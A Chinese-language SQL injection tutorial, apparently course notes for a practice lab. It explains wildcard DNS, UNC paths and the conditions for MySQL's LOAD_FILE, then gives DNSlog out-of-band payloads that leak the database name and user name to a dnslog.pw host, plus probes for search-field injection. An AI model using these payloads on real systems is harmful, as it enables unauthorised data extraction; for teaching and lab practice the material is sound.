SQL注入（cookie、base64、dnslog外带、搜索型注入）

做一个*.example.com的次级域名A记录指向111.111.111.111，那么生效后当访问者无论是输入"123.example.com"还是"abc.example.com"抑或者"123.abc.example.com"甚至是任意字符组成的子域名均会指向到111.111.111.111这个IP地址

原文链接：域名管理常见问题：什么是泛解析？（中科三方）_*:泛解析-CSDN博客

UNC路径

UNC路径UNC路径通用命名规则，也称通用命名规范、通用命名约定。什么是UNC路径？UNC路径就是类似\hacker这样的形式的网络路径。它符合\servername\sharename 格式，其中 servername 是服务器名，sharename 是共享资源的名称。目录或文件的 UNC 名称可以包括共享名称下的目录路径，格式为：\servername\sharename\directory\filename。例如hacker计算机的名为gok123的共享文件夹，用UNC表示就是\hacker\gok123。我们熟悉的命令行访问法访问网上邻居，实际上应该称作UNC路径访问法。不过UNC路径也可以这样写//servername/sharename [强烈建议这样写]

一般格式：

//计算机名/共享资源

//IP地址/共享资源

//域名/共享资源

网上邻居

网上邻居是微软系统自带的功能之一，主要是用来访问局域网的其它电脑的

LOAD_FILE函数

要使用此函数的条件（四个）系统、用户、文件大小、值

secure_file_priv=''必须为空文件，这个功能不是默认开启的，需要在mysql配置文件my.ini中加一句secure_file_priv=''

必须位于服务器主机上必须指定完整路径的文件

而且必须有FILE权限。要用到load_file()，通常需要root权限（LOAD_FILE()函数通常需要 FILE 权限，而 FILE 权限通常是分配给 MySQL 的SUPER特权用户，例如 root 用户）

该文件所有字节可读，但文件内容必须小于max_allowed_packet（限制server接受的数据包大小函数，默认1MB）。

目标服务器必须是windows系统

如果该文件不存在或无法读取，因为前面的条件之一不满足，函数返回NULL

查看secure_file_priv状态命令

show global variables like '%secure_file_priv%';

dnglog注入语句

爆当前数据库

select LOAD_FILE(CONCAT("\\\\",DATABASE(),".8gno8bo8.dnslog.pw/xxx"));

用户名：

id=1' and load_file(concat("//",user(),".8gno8bo8.dnslog.pw/aaa")) -- s

搜索型注入---注入判断

搜索 keywords' ，如果出错的话，有90%的可能性存在注入；
搜索 keywords%' and 1=1 and '%'=' （这个语句的功能就相当于普通SQL注入的 and 1=1 ）看返回情况；
搜索 keywords%' and 1=2 and '%'=' （这个语句的功能就相当于普通SQL注入的 and 1=2 ）看返回情况；
根据2和3的返回情况来判断是不是搜索型文本框注入了。

ryan'and 1=1 and '%'='//用于闭合后面的%
ryan'and 1=1 -- s //也可直接注释，但可能某些情况下不可行

如果你看过我先前发布的三篇sql注入文章，那么学到这里你已经接触了绝大部分的sql注入类型，请前往靶场进行实战练习，靶场地址见文章开头，之后我会不断地对sql注入进行更深入地讲解，请关注持续更新（本文内容来自课件，如有版权问题请与我联系）